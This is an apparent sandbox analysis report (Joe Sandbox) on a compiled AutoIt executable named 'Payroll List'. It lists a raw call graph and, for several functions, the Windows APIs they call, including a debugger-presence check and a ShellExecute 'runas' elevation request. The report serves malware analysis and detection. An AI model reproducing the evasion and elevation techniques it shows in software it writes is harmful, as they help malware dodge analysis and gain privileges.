95197->95198 95295 1413f1 47 API calls _doexit 95197->95295 95296 141186 47 API calls _doexit 95198->95296 95201 145f0e _fprintf 95203 147f01 95202->95203 95203->95168 95204->95170 95297 14123a 30 API calls 2 library calls 95205->95297 95207 147b4c 95298 147e23 InitializeCriticalSectionAndSpinCount 95207->95298 95209 147b51 95210 147b55 95209->95210 95300 147e6d TlsAlloc 95209->95300 95299 147bbd 50 API calls 2 library calls 95210->95299 95213 147b5a 95213->95174 95214 147b67 95214->95210 95215 147b72 95214->95215 95301 146986 95215->95301 95218 147bb4 95309 147bbd 50 API calls 2 library calls 95218->95309 95221 147b93 95221->95218 95223 147b99 95221->95223 95222 147bb9 95222->95174 95308 147a94 47 API calls 4 library calls 95223->95308 95225 147ba1 GetCurrentThreadId 95225->95174 95227 14acbf _fprintf 95226->95227 95318 147cf4 95227->95318 95229 14acc6 95230 146986 __calloc_crt 47 API calls 95229->95230 95231 14acd7 95230->95231 95232 14ad42 GetStartupInfoW 95231->95232 95233 14ace2 @_EH4_CallFilterFunc@8 _fprintf 95231->95233 95240 14ae80 95232->95240 95242 14ad57 95232->95242 95233->95178 95234 14af44 95325 14af58 LeaveCriticalSection _doexit 95234->95325 95236 14ada5 95236->95240 95243 14ade5 InitializeCriticalSectionAndSpinCount 95236->95243 95244 14add7 GetFileType 95236->95244 95237 14aec9 GetStdHandle 95237->95240 95238 146986 __calloc_crt 47 API calls 95238->95242 95239 14aedb GetFileType 95239->95240 95240->95234 95240->95237 95240->95239 95241 14af08 InitializeCriticalSectionAndSpinCount 95240->95241 95241->95240 95242->95236 95242->95238 95242->95240 95243->95236 95244->95236 95244->95243 95246 145ead 95245->95246 95247 152e8e 95245->95247 95252 152a7b GetModuleFileNameW 95246->95252 95364 1469d0 47 API calls __crtLCMapStringA_stat 95247->95364 95250 152eca FreeEnvironmentStringsW 95250->95246 95251 152eb4 ___crtGetEnvironmentStringsW 95251->95250 95253 152aaf _wparse_cmdline 95252->95253 95254 145eb7 95253->95254 95255 152ae9 95253->95255 95254->95186 
95292 14115b 47 API calls 3 library calls 95254->95292 95365 1469d0 47 API calls __crtLCMapStringA_stat 95255->95365 95257 152aef _wparse_cmdline 95257->95254 95259 152ccd __wsetenvp 95258->95259 95263 152cc5 95258->95263 95260 146986 __calloc_crt 47 API calls 95259->95260 95268 152cf6 __wsetenvp 95260->95268 95261 152d4d 95262 141c9d _free 47 API calls 95261->95262 95262->95263 95263->95189 95264 146986 __calloc_crt 47 API calls 95264->95268 95265 152d72 95266 141c9d _free 47 API calls 95265->95266 95266->95263 95268->95261 95268->95263 95268->95264 95268->95265 95269 152d89 95268->95269 95366 152567 47 API calls __wcsnicmp 95268->95366 95367 146e20 IsProcessorFeaturePresent 95269->95367 95271 152d95 95271->95189 95273 1411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95272->95273 95275 1411e0 __IsNonwritableInCurrentImage 95273->95275 95390 140f0a 52 API calls __cinit 95273->95390 95275->95193 95277 191ebf 95276->95277 95278 123a29 95276->95278 95279 123a63 IsThemeActive 95278->95279 95391 141405 95279->95391 95283 123a8f 95403 123adb SystemParametersInfoW SystemParametersInfoW 95283->95403 95285 123a9b 95404 123d19 95285->95404 95287 123aa3 SystemParametersInfoW 95288 123ac8 95287->95288 95288->95197 95289->95171 95290->95176 95291->95182 95295->95198 95296->95201 95297->95207 95298->95209 95299->95213 95300->95214 95302 14698d 95301->95302 95304 1469ca 95302->95304 95305 1469ab Sleep 95302->95305 95310 1530aa 95302->95310 95304->95218 95307 147ec9 TlsSetValue 95304->95307 95306 1469c2 95305->95306 95306->95302 95306->95304 95307->95221 95308->95225 95309->95222 95311 1530b5 95310->95311 95315 1530d0 __calloc_impl 95310->95315 95312 1530c1 95311->95312 95311->95315 95317 147c0e 47 API calls __getptd_noexit 95312->95317 95313 1530e0 HeapAlloc 95313->95315 95316 1530c6 95313->95316 95315->95313 95315->95316 95316->95302 95317->95316 95319 147d05 95318->95319 95320 147d18 EnterCriticalSection 95318->95320 95326 147d7c 95319->95326 
95320->95229 95322 147d0b 95322->95320 95350 14115b 47 API calls 3 library calls 95322->95350 95325->95233 95327 147d88 _fprintf 95326->95327 95328 147d91 95327->95328 95329 147da9 95327->95329 95351 1481c2 47 API calls 2 library calls 95328->95351 95336 147e11 _fprintf 95329->95336 95344 147da7 95329->95344 95331 147d96 95352 14821f 47 API calls 8 library calls 95331->95352 95334 147dbd 95337 147dc4 95334->95337 95338 147dd3 95334->95338 95335 147d9d 95353 141145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95335->95353 95336->95322 95355 147c0e 47 API calls __getptd_noexit 95337->95355 95339 147cf4 __lock 46 API calls 95338->95339 95343 147dda 95339->95343 95342 147dc9 95342->95336 95345 147dfe 95343->95345 95346 147de9 InitializeCriticalSectionAndSpinCount 95343->95346 95344->95329 95354 1469d0 47 API calls __crtLCMapStringA_stat 95344->95354 95356 141c9d 95345->95356 95347 147e04 95346->95347 95362 147e1a LeaveCriticalSection _doexit 95347->95362 95351->95331 95352->95335 95354->95334 95355->95342 95357 141ca6 RtlFreeHeap 95356->95357 95361 141ccf _free 95356->95361 95358 141cbb 95357->95358 95357->95361 95363 147c0e 47 API calls __getptd_noexit 95358->95363 95360 141cc1 GetLastError 95360->95361 95361->95347 95362->95336 95363->95360 95364->95251 95365->95257 95366->95268 95368 146e2b 95367->95368 95373 146cb5 95368->95373 95372 146e46 95372->95271 95374 146ccf _memset __call_reportfault 95373->95374 95375 146cef IsDebuggerPresent 95374->95375 95381 1481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95375->95381 95378 146db3 __call_reportfault 95382 14a70c 95378->95382 95379 146dd6 95380 148197 GetCurrentProcess TerminateProcess 95379->95380 95380->95372 95381->95378 95383 14a714 95382->95383 95384 14a716 IsProcessorFeaturePresent 95382->95384 95383->95379 95386 1537b0 95384->95386 95389 15375f 5 API calls 2 library calls 95386->95389 95388 153893 95388->95379 95389->95388 95390->95275 95392 147cf4 __lock 47 API calls 
95391->95392 95393 141410 95392->95393 95456 147e58 LeaveCriticalSection 95393->95456 95395 123a88 95396 14146d 95395->95396 95397 141477 95396->95397 95398 141491 95396->95398 95397->95398 95457 147c0e 47 API calls __getptd_noexit 95397->95457 95398->95283 95400 141481 95458 146e10 8 API calls __wcsnicmp 95400->95458 95402 14148c 95402->95283 95403->95285 95405 123d26 __ftell_nolock 95404->95405 95406 12d7f7 48 API calls 95405->95406 95407 123d31 GetCurrentDirectoryW 95406->95407 95459 1261ca 95407->95459 95409 123d57 IsDebuggerPresent 95410 123d65 95409->95410 95411 191cc1 MessageBoxA 95409->95411 95412 123e3a 95410->95412 95414 191cd9 95410->95414 95415 123d82 95410->95415 95411->95414 95413 123e41 SetCurrentDirectoryW 95412->95413 95416 123e4e Mailbox 95413->95416 95636 13c682 48 API calls 95414->95636 95533 1240e5 95415->95533 95416->95287 95419 191ce9 95424 191cff SetCurrentDirectoryW 95419->95424 95421 123da0 GetFullPathNameW 95422 126a63 48 API calls 95421->95422 95423 123ddb 95422->95423 95549 126430 95423->95549 95424->95416 95427 123df6 95428 123e00 95427->95428 95637 1671fa AllocateAndInitializeSid CheckTokenMembership FreeSid 95427->95637 95565 123e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 95428->95565 95431 191d1c 95431->95428 95434 191d2d 95431->95434 95435 125374 50 API calls 95434->95435 95438 191d35 95435->95438 95436 123e0a 95437 123e1f 95436->95437 95634 124ffc 67 API calls _memset 95436->95634 95573 12e8d0 95437->95573 95441 12ce19 48 API calls 95438->95441 95443 191d42 95441->95443 95445 191d49 95443->95445 95446 191d6e 95443->95446 95448 12518c 48 API calls 95445->95448 95447 12518c 48 API calls 95446->95447 95449 191d6a GetForegroundWindow ShellExecuteW 95447->95449 95450 191d54 95448->95450 95454 191d9e Mailbox 95449->95454 95452 12510d 48 API calls 95450->95452 95453 191d61 95452->95453 95455 12518c 48 API calls 95453->95455 95454->95412 95455->95449 95456->95395 95457->95400 95458->95402 95638 13e99b 95459->95638 95463 
1261eb 95464 125374 50 API calls 95463->95464 95465 1261ff 95464->95465 95466 12ce19 48 API calls 95465->95466 95467 12620c 95466->95467 95655 1239db 95467->95655 95469 126216 Mailbox 95470 126eed 48 API calls 95469->95470 95471 12622b 95470->95471 95667 129048 95471->95667 95474 12ce19 48 API calls 95475 126244 95474->95475 95670 12d6e9 95475->95670 95477 126254 Mailbox 95478 12ce19 48 API calls 95477->95478 95479 12627c 95478->95479 95480 12d6e9 55 API calls 95479->95480 95481 12628f Mailbox 95480->95481 95482 12ce19 48 API calls 95481->95482 95483 1262a0 95482->95483 95674 12d645 95483->95674 95485 1262b2 Mailbox 95486 12d7f7 48 API calls 95485->95486 95487 1262c5 95486->95487 95684 1263fc 95487->95684 95491 1262df 95492 191c08 95491->95492 95493 1262e9 95491->95493 95495 1263fc 48 API calls 95492->95495 95494 140fa7 _W_store_winword 59 API calls 95493->95494 95497 1262f4 95494->95497 95496 191c1c 95495->95496 95499 1263fc 48 API calls 95496->95499 95497->95496 95498 1262fe 95497->95498 95500 140fa7 _W_store_winword 59 API calls 95498->95500 95503 191c38 95499->95503 95501 126309 95500->95501 95502 126313 95501->95502 95501->95503 95505 140fa7 _W_store_winword 59 API calls 95502->95505 95504 125374 50 API calls 95503->95504 95506 191c5d 95504->95506 95507 12631e 95505->95507 95508 1263fc 48 API calls 95506->95508 95509 12635f 95507->95509 95510 191c86 95507->95510 95513 1263fc 48 API calls 95507->95513 95512 191c69 95508->95512 95509->95510 95511 12636c 95509->95511 95514 126eed 48 API calls 95510->95514 95700 13c050 95511->95700 95515 126eed 48 API calls 95512->95515 95516 126342 95513->95516 95517 191ca8 95514->95517 95519 191c77 95515->95519 95520 126eed 48 API calls 95516->95520 95521 1263fc 48 API calls 95517->95521 95523 1263fc 48 API calls 95519->95523 95524 126350 95520->95524 95525 191cb5 95521->95525 95522 126384 95711 131b90 95522->95711 95523->95510 95527 1263fc 48 API calls 95524->95527 95525->95525 95527->95509 95528 131b90 48 API calls 95530 
126394 95528->95530 95530->95528 95531 1263fc 48 API calls 95530->95531 95532 1263d6 Mailbox 95530->95532 95727 126b68 48 API calls 95530->95727 95531->95530 95532->95409 95534 1240f2 __ftell_nolock 95533->95534 95535 19370e _memset 95534->95535 95536 12410b 95534->95536 95538 19372a GetOpenFileNameW 95535->95538 95537 12660f 49 API calls 95536->95537 95539 124114 95537->95539 95540 193779 95538->95540 96209 1240a7 95539->96209 95542 126a63 48 API calls 95540->95542 95544 19378e 95542->95544 95544->95544 95546 124129 96227 124139 95546->96227 95550 12643d __ftell_nolock 95549->95550 96432 124c75 95550->96432 95552 126442 95564 123dee 95552->95564 96443 125928 86 API calls 95552->96443 95554 12644f 95554->95564 96444 125798 88 API calls Mailbox 95554->96444 95556 126458 95557 12645c GetFullPathNameW 95556->95557 95556->95564 95558 126a63 48 API calls 95557->95558 95559 126488 95558->95559 95560 126a63 48 API calls 95559->95560 95561 126495 95560->95561 95562 126a63 48 API calls 95561->95562 95563 195dcf _wcscat 95561->95563 95562->95564 95564->95419 95564->95427 95566 191cba 95565->95566 95567 123ed8 95565->95567 96448 124024 95567->96448 95571 123e05 95572 1236b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95571->95572 95572->95436 95574 12e8f6 95573->95574 95633 12e906 Mailbox 95573->95633 95575 12ed52 95574->95575 95574->95633 96549 13e3cd 342 API calls 95575->96549 95576 16cc5c 86 API calls 95576->95633 95578 123e2a 95578->95412 95635 123847 Shell_NotifyIconW _memset 95578->95635 95580 12ed63 95580->95578 95582 12ed70 95580->95582 95581 12e94c PeekMessageW 95581->95633 96551 13e312 342 API calls Mailbox 95582->96551 95584 19526e Sleep 95584->95633 95585 12ed77 LockWindowUpdate DestroyWindow GetMessageW 95585->95578 95588 12eda9 95585->95588 95587 12ebc7 95587->95578 96550 122ff6 16 API calls 95587->96550 95590 1959ef TranslateMessage DispatchMessageW GetMessageW 95588->95590 95590->95590 95591 195a1f 95590->95591 95591->95578 95592 12ed21 PeekMessageW 
95592->95633 95593 13f4ea 48 API calls 95593->95633 95594 12ebf7 timeGetTime 95594->95633 95596 126eed 48 API calls 95596->95633 95597 195557 WaitForSingleObject 95600 195574 GetExitCodeProcess CloseHandle 95597->95600 95597->95633 95598 12ed3a TranslateMessage DispatchMessageW 95598->95592 95599 122aae 318 API calls 95599->95633 95600->95633 95601 19588f Sleep 95629 195429 Mailbox 95601->95629 95602 12d7f7 48 API calls 95602->95629 95603 12edae timeGetTime 96552 121caa 49 API calls 95603->96552 95606 195733 Sleep 95606->95629 95608 13dc38 timeGetTime 95608->95629 95609 195926 GetExitCodeProcess 95611 19593c WaitForSingleObject 95609->95611 95612 195952 CloseHandle 95609->95612 95611->95612 95611->95633 95612->95629 95613 195445 Sleep 95613->95633 95615 122c79 107 API calls 95615->95629 95616 195432 Sleep 95616->95613 95617 188c4b 108 API calls 95617->95629 95618 1959ae Sleep 95618->95633 95619 121caa 49 API calls 95619->95633 95620 12ce19 48 API calls 95620->95629 95625 12d6e9 55 API calls 95625->95629 95629->95602 95629->95608 95629->95609 95629->95613 95629->95615 95629->95616 95629->95617 95629->95618 95629->95620 95629->95625 95629->95633 96554 164cbe 49 API calls Mailbox 95629->96554 96555 121caa 49 API calls 95629->96555 96556 122aae 342 API calls 95629->96556 96558 17ccb2 50 API calls 95629->96558 96559 167a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95629->96559 96560 166532 63 API calls 3 library calls 95629->96560 95630 12ce19 48 API calls 95630->95633 95632 12d6e9 55 API calls 95632->95633 95633->95576 95633->95581 95633->95584 95633->95587 95633->95592 95633->95593 95633->95594 95633->95596 95633->95597 95633->95598 95633->95599 95633->95601 95633->95603 95633->95606 95633->95613 95633->95619 95633->95629 95633->95630 95633->95632 96453 12f110 95633->96453 96518 1345e0 95633->96518 96536 13e244 95633->96536 96541 13dc5f 95633->96541 96546 12eed0 342 API calls Mailbox 95633->96546 96547 12ef00 342 API calls 
95633->96547 96548 133200 342 API calls 2 library calls 95633->96548 96553 188d23 48 API calls 95633->96553 96557 12fe30 342 API calls __cinit 95633->96557 95634->95437 95635->95412 95636->95419 95637->95431 95639 12d7f7 48 API calls 95638->95639 95640 1261db 95639->95640 95641 126009 95640->95641 95642 126016 __ftell_nolock 95641->95642 95643 126a63 48 API calls 95642->95643 95654 12617c Mailbox 95642->95654 95645 126048 95643->95645 95647 12607e Mailbox 95645->95647 95728 1261a6 95645->95728 95646 12614f 95648 12ce19 48 API calls 95646->95648 95646->95654 95647->95646 95650 12ce19 48 API calls 95647->95650 95652 1261a6 48 API calls 95647->95652 95653 1264cf 48 API calls 95647->95653 95647->95654 95649 126170 95648->95649 95651 1264cf 48 API calls 95649->95651 95650->95647 95651->95654 95652->95647 95653->95647 95654->95463 95731 1241a9 95655->95731 95658 123a06 95658->95469 95661 192ff0 95663 141c9d _free 47 API calls 95661->95663 95664 192ffd 95663->95664 95665 124252 84 API calls 95664->95665 95666 193006 95665->95666 95666->95666 95668 13f4ea 48 API calls 95667->95668 95669 126237 95668->95669 95669->95474 95671 12d6f4 95670->95671 95672 12d71b 95671->95672 96198 12d764 55 API calls 95671->96198 95672->95477 95675 12d654 95674->95675 95683 12d67e 95674->95683 95677 12d65b 95675->95677 95678 12d6c2 95675->95678 95676 12d6ab 95676->95683 96200 13dce0 53 API calls 95676->96200 95677->95676 95679 12d666 95677->95679 95678->95676 96201 13dce0 53 API calls 95678->96201 96199 12d9a0 53 API calls __cinit 95679->96199 95683->95485 95685 126406 95684->95685 95686 12641f 95684->95686 95688 126eed 48 API calls 95685->95688 95687 126a63 48 API calls 95686->95687 95689 1262d1 95687->95689 95688->95689 95690 140fa7 95689->95690 95691 140fb3 95690->95691 95692 141028 95690->95692 95699 140fd8 95691->95699 96202 147c0e 47 API calls __getptd_noexit 95691->96202 96204 14103a 59 API calls 3 library calls 95692->96204 95694 141035 95694->95491 95696 140fbf 96203 146e10 8 API calls 
__wcsnicmp 95696->96203 95698 140fca 95698->95491 95699->95491 95701 13c064 95700->95701 95703 13c069 Mailbox 95700->95703 96205 13c1af 48 API calls 95701->96205 95708 13c077 95703->95708 96206 13c15c 48 API calls 95703->96206 95705 13f4ea 48 API calls 95707 13c108 95705->95707 95706 13c152 95706->95522 95709 13f4ea 48 API calls 95707->95709 95708->95705 95708->95706 95710 13c113 95709->95710 95710->95522 95712 131cf6 95711->95712 95714 131ba2 95711->95714 95712->95530 95715 13f4ea 48 API calls 95714->95715 95725 131bae 95714->95725 95716 1949c4 95715->95716 95717 13f4ea 48 API calls 95716->95717 95726 1949cf 95717->95726 95718 131bb9 95719 131c5d 95718->95719 95720 13f4ea 48 API calls 95718->95720 95719->95530 95721 131c9f 95720->95721 95722 131cb2 95721->95722 96207 122925 48 API calls 95721->96207 95722->95530 95724 13f4ea 48 API calls 95724->95726 95725->95718 96208 13c15c 48 API calls 95725->96208 95726->95724 95726->95725 95727->95530 95729 12bdfa 48 API calls 95728->95729 95730 1261b1 95729->95730 95730->95645 95796 124214 95731->95796 95736 1241d4 LoadLibraryExW 95806 124291 95736->95806 95737 194f73 95739 124252 84 API calls 95737->95739 95741 194f7a 95739->95741 95743 124291 3 API calls 95741->95743 95745 194f82 95743->95745 95744 1241fb 95744->95745 95746 124207 95744->95746 95832 1244ed 95745->95832 95748 124252 84 API calls 95746->95748 95750 1239fe 95748->95750 95750->95658 95755 16c396 95750->95755 95752 194fa9 95840 124950 95752->95840 95754 194fb6 95756 124517 83 API calls 95755->95756 95757 16c405 95756->95757 96018 16c56d 95757->96018 95760 1244ed 64 API calls 95761 16c432 95760->95761 95762 1244ed 64 API calls 95761->95762 95763 16c442 95762->95763 95764 1244ed 64 API calls 95763->95764 95765 16c45d 95764->95765 95766 1244ed 64 API calls 95765->95766 95767 16c478 95766->95767 95768 124517 83 API calls 95767->95768 95769 16c48f 95768->95769 95770 14395c __crtLCMapStringA_stat 47 API calls 95769->95770 95771 16c496 95770->95771 95772 14395c 
__crtLCMapStringA_stat 47 API calls 95771->95772 95773 16c4a0 95772->95773 95774 1244ed 64 API calls 95773->95774 95775 16c4b4 95774->95775 95776 16bf5a GetSystemTimeAsFileTime 95775->95776 95777 16c4c7 95776->95777 95778 16c4f1 95777->95778 95779 16c4dc 95777->95779 95780 16c556 95778->95780 95781 16c4f7 95778->95781 95782 141c9d _free 47 API calls 95779->95782 95785 141c9d _free 47 API calls 95780->95785 96024 16b965 95781->96024 95783 16c4e2 95782->95783 95786 141c9d _free 47 API calls 95783->95786 95788 16c41b 95785->95788 95786->95788 95788->95661 95790 124252 95788->95790 95789 141c9d _free 47 API calls 95789->95788 95791 124263 95790->95791 95792 12425c 95790->95792 95794 124272 95791->95794 95795 124283 FreeLibrary 95791->95795 95793 1435e4 __fcloseall 83 API calls 95792->95793 95793->95791 95794->95661 95795->95794 95845 124339 95796->95845 95799 12423c 95801 124244 FreeLibrary 95799->95801 95802 1241bb 95799->95802 95801->95802 95803 143499 95802->95803 95853 1434ae 95803->95853 95805 1241c8 95805->95736 95805->95737 95932 1242e4 95806->95932 95808 1242b8 95811 1242c1 FreeLibrary 95808->95811 95812 1241ec 95808->95812 95811->95812 95813 124380 95812->95813 95814 13f4ea 48 API calls 95813->95814 95815 124395 95814->95815 95816 1247b7 48 API calls 95815->95816 95817 1243a1 ___crtGetEnvironmentStringsW 95816->95817 95818 1243dc 95817->95818 95819 1244d1 95817->95819 95820 124499 95817->95820 95821 124950 57 API calls 95818->95821 95951 16c750 93 API calls 95819->95951 95940 12406b CreateStreamOnHGlobal 95820->95940 95829 1243e5 95821->95829 95824 1244ed 64 API calls 95824->95829 95825 124479 95825->95744 95827 194ed7 95828 124517 83 API calls 95827->95828 95830 194eeb 95828->95830 95829->95824 95829->95825 95829->95827 95946 124517 95829->95946 95831 1244ed 64 API calls 95830->95831 95831->95825 95833 194fc0 95832->95833 95834 1244ff 95832->95834 95975 14381e 95834->95975 95837 16bf5a 95995 16bdb4 95837->95995 95839 16bf70 95839->95752 95841 195002 
95840->95841 95842 12495f 95840->95842 96000 143e65 95842->96000 95844 124967 95844->95754 95849 12434b 95845->95849 95848 124321 LoadLibraryA GetProcAddress 95848->95799 95850 12422f 95849->95850 95851 124354 LoadLibraryA 95849->95851 95850->95799 95850->95848 95851->95850 95852 124365 GetProcAddress 95851->95852 95852->95850 95856 1434ba _fprintf 95853->95856 95854 1434cd 95901 147c0e 47 API calls __getptd_noexit 95854->95901 95856->95854 95858 1434fe 95856->95858 95857 1434d2 95902 146e10 8 API calls __wcsnicmp 95857->95902 95872 14e4c8 95858->95872 95861 143503 95862 14350c 95861->95862 95863 143519 95861->95863 95903 147c0e 47 API calls __getptd_noexit 95862->95903 95865 143543 95863->95865 95866 143523 95863->95866 95886 14e5e0 95865->95886 95904 147c0e 47 API calls __getptd_noexit 95866->95904 95868 1434dd @_EH4_CallFilterFunc@8 _fprintf 95868->95805 95873 14e4d4 _fprintf 95872->95873 95874 147cf4 __lock 47 API calls 95873->95874 95882 14e4e2 95874->95882 95875 14e552 95906 14e5d7 95875->95906 95876 14e559 95911 1469d0 47 API calls __crtLCMapStringA_stat 95876->95911 95879 14e560 95879->95875 95881 14e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95879->95881 95880 14e5cc _fprintf 95880->95861 95881->95875 95882->95875 95882->95876 95883 147d7c __mtinitlocknum 47 API calls 95882->95883 95909 144e5b 48 API calls __lock 95882->95909 95910 144ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95882->95910 95883->95882 95887 14e600 __wopenfile 95886->95887 95888 14e61a 95887->95888 95900 14e7d5 95887->95900 95918 14185b 59 API calls 2 library calls 95887->95918 95916 147c0e 47 API calls __getptd_noexit 95888->95916 95890 14e61f 95917 146e10 8 API calls __wcsnicmp 95890->95917 95892 14e838 95913 1563c9 95892->95913 95893 14354e 95905 143570 LeaveCriticalSection LeaveCriticalSection _fprintf 95893->95905 95896 14e7ce 95896->95900 95919 14185b 59 API calls 2 library calls 95896->95919 95898 14e7ed 95898->95900 95920 14185b 59 API calls 2 library 

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abb0a25bac4b21ebe4eb7738fcac0baadc4b08a4e3e2e6751b5cf667ff5269c1
                                                                    • Instruction ID: 32675cfc39ab764c5d4ffe1c571311f5f8fac1934c244e0140751e0c7d33748d
                                                                    • Opcode Fuzzy Hash: abb0a25bac4b21ebe4eb7738fcac0baadc4b08a4e3e2e6751b5cf667ff5269c1
                                                                    • Instruction Fuzzy Hash: ED326B75B062298BCB25CF54DC81AE9B7B5FF4A314F1840D9E40AE7AA1D7309E80CF52

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00123AA3,?), ref: 00123D45
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00123AA3,?), ref: 00123D57
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,001E1148,001E1130,?,?,?,?,00123AA3,?), ref: 00123DC8
                                                                      • Part of subcall function 00126430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00123DEE,001E1148,?,?,?,?,?,00123AA3,?), ref: 00126471
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00123AA3,?), ref: 00123E48
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001D28F4,00000010), ref: 00191CCE
                                                                    • SetCurrentDirectoryW.KERNEL32(?,001E1148,?,?,?,?,?,00123AA3,?), ref: 00191D06
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001BDAB4,001E1148,?,?,?,?,?,00123AA3,?), ref: 00191D89
                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00123AA3), ref: 00191D90
                                                                      • Part of subcall function 00123E6E: GetSysColorBrush.USER32(0000000F), ref: 00123E79
                                                                      • Part of subcall function 00123E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00123E88
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(00000063), ref: 00123E9E
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(000000A4), ref: 00123EB0
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(000000A2), ref: 00123EC2
                                                                      • Part of subcall function 00123E6E: RegisterClassExW.USER32(?), ref: 00123F30
                                                                      • Part of subcall function 001236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001236E6
                                                                      • Part of subcall function 001236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00123707
                                                                      • Part of subcall function 001236B8: ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 0012371B
                                                                      • Part of subcall function 001236B8: ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 00123724
                                                                      • Part of subcall function 00124FFC: _memset.LIBCMT ref: 00125022
                                                                      • Part of subcall function 00124FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001250CB
                                                                    Strings
                                                                    • This is a third-party compiled AutoIt script., xrefs: 00191CC8
                                                                    • runas, xrefs: 00191D84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 438480954-3287110873
                                                                    • Opcode ID: 676fa6125f74720b485ef26a5ab36b48f1a0c3dcaf40f147d61b768588396e4a
                                                                    • Instruction ID: 0b43e67d4dbdd64d63c8064c94c10c74c5d63944d0a1809135435aa271e7a6d6
                                                                    • Opcode Fuzzy Hash: 676fa6125f74720b485ef26a5ab36b48f1a0c3dcaf40f147d61b768588396e4a
                                                                    • Instruction Fuzzy Hash: A7513B30E04299BECF15ABF0FC85EED7B79AF25700F004069F61267592DB744AA9CB21

                                                                    Control-flow Graph
                                                                    • Entry block: 0013DDC0 (graph image not reproduced here; the original figure marks basic blocks as Executed or Not Executed)
                                                                    • Internal calls: 0012D7F7, 00126A63, 0013DFB4, 00126571, 0013DF77, 0013DF5F, 0013E00C, 0013DFF4
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 0013DDEC
                                                                    • GetCurrentProcess.KERNEL32(00000000,001BDC38,?,?), ref: 0013DEAC
                                                                    • GetNativeSystemInfo.KERNELBASE(?,001BDC38,?,?), ref: 0013DF01
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013DF0C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013DF1F
                                                                    • GetSystemInfo.KERNEL32(?,001BDC38,?,?), ref: 0013DF29
                                                                    • GetSystemInfo.KERNEL32(?,001BDC38,?,?), ref: 0013DF35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                    • String ID:
